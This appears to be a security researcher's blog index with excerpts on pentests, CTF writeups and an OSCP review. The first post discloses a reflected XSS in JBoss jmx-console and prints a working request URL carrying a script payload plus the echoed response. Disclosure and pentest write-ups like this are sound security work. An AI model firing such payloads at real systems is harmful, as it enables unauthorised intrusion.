Posts

Reflected XSS in jmx-console HtmlAdaptor DatabasePersistencePlugin parameter

Image
1) Description:
Jmx-console's DatabasePersistencePlugin parameter in HtmlAdaptor is vulnerable to XSS
/jmx-console/HtmlAdaptor?DatabasePersistencePlugin

2) Exploit:
##############Request####################
https://abc.com:8080/jmx-console/HtmlAdaptor?DatabasePersistencePlugin=org.jboss.ejb.txtimer.GeneralPurposeDatabasePersistencePlugin%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E&name=jboss.ejb%3aservice%3dEJBTimerService%2cpersistencePolicy%3ddatabase&action=updateAttributes&DataSource=jboss.jca%3aservice%3dDataSourceBinding%2cname%3dDefaultDS

############Response#####################
.............
 <input type="text" name="DatabasePersistencePlugin" value="org.jboss.ejb.txtimer.GeneralPurposeDatabasePersistencePlugin"><script>alert(1)</script>" >
................




3) Fixed version:
Versions after 4.0.2 are fixed


Note: Authenticated access to jmx-console is required to perform XSS

A short story of LFI and XSS on Cisco Unified Communications Manager Administrative Interface

Image
Cisco Unified Communications Manager Administrative Web Interface Directory Traversal Vulnerability   CVE-2013-5528 {Feels happy when your exploit gets published on exploit-db.com https://www.exploit-db.com/exploits/40887/ }
In one of the pentest engagement I got to play with Cisco Unified Communications Manager Administrative Web Interface 8.x.Well I was able to find LFI and XSS on one of the parameter.
After few months I reported them to Cisco team. Few mail exchanges were done and Cisco team told me that the vulnerability is previously disclosed via CVE 2013-5528.

The team says they have covered LFI and XSS by the same advisory. Any ways, I took the permission to publish the exploit from the team and here I am publishing a writeup.


The vulnerability CVE 2013-5528: Directory traversal vulnerability exists on Cisco Unified Communications Manager Administrative Web Interface after authentication. The vulnerability is due to a failure to properly sanitize user-supplied input passed to …

Apache AXIS server pentest

Image
In one of my pentest engagement the scope was to test  a website abc.com/xyz/pqr.html and its mobile application.
The website seems to be stronger and I was not able to find any vulnerability. So I switched to mobile application.
When I was testing the mobile application, I was doing code analysis and found a URL in the code which was invoking a web service. The URL is as follows.

https://abc.com/InstaWebServices/services/VersionCheck


Penetration testing of citrix server.

Image
"This was previously published at InfoSec Institute's Resources site."
Here I'll discuss about how I did pentest of a citrix server in lab network.


First let us understand about Windows terminal service.

Windows Terminal Services (or Remote Desktop Services) is a feature of Windows 2003/2008 which allows multiple 'sessions' to be brokered to each enabled server, each running a server desktop or embedded application.

Citrix is layered on top of Terminal Services (2003) or the RDS role (2008) and extend the functionality of this 'session based' access. Additional features such as ICA and it's HDX feature set which provide better application performance for interactive, graphical and WAN based applications, resource metric based load balancing, centralized administration, geographically dispersed 'terminal server farm' design options, application publishing (individual apps as opposed to an app embedded in a desktop session), an…

File transfer and privilege escalation using Powershell

Image
I was thinking of writing an article for some big brand. Eventually I got a notification on LinkedIn about collaboration for Powershell from Pentestmag.com (Poland)

I've submitted an article for powershell and it is published by pentestmag.com


The magazine can be download from the following URL (needs registration):

The name of my article in the magazine is Privilege escalation using Powershell

https://pentestmag.com/download/power-shell-for-penetration-testing/

CTF Hack Dat Kiwi Writeups

Image
I've participated in a CTF hack dat kiwi held on 19th and 20th November 2015. The CTF was organized by Abius X. Let me tell you this was one of the finest CTF that I've every participated.
Everything was awesome and organised.

I've solved few challenges and was at 234th rank http://hack.dat.kiwi/scoreboard (Handle: Transformers)


SSL_Sniff 1 (50 points) A wireshark file was given (dump.pcap) can be found
https://www.dropbox.com/s/85f7kipys931m8n/dump.pcap?dl=0


MY OSCP REVIEW

Image
MY OSCP REVIEW
About me I am just a guy who has done B.E (Computer Engineering), C.E.H and I am doing vulnerability assessment for different clients in Mumbai.

Inspiration to do OSCP Wanted to read technical stuff only then skip this para. Like other guyz I thought that OSCP is one of the most difficult task in the world of IT Security.
And yes, it is one the difficult mission you could ever face. Back in Dec 2014 I was really bored with the conventional vulnerability assessment thing, I wanted to do some more exploitation and some black hat stuff. But in our job we were not allowed to do so, as the environment used to be critical most of the time and time for completing the task was less.
So I asked few question on some group in facebook regarding How can I learn more exploitation stuff.
There was a guy with the name Mr.WhiteW0rm who have given me a brilliant answer and recommended me to do OSCP. That time I thought though I won't be able to do OSCP but at least I'll study in i…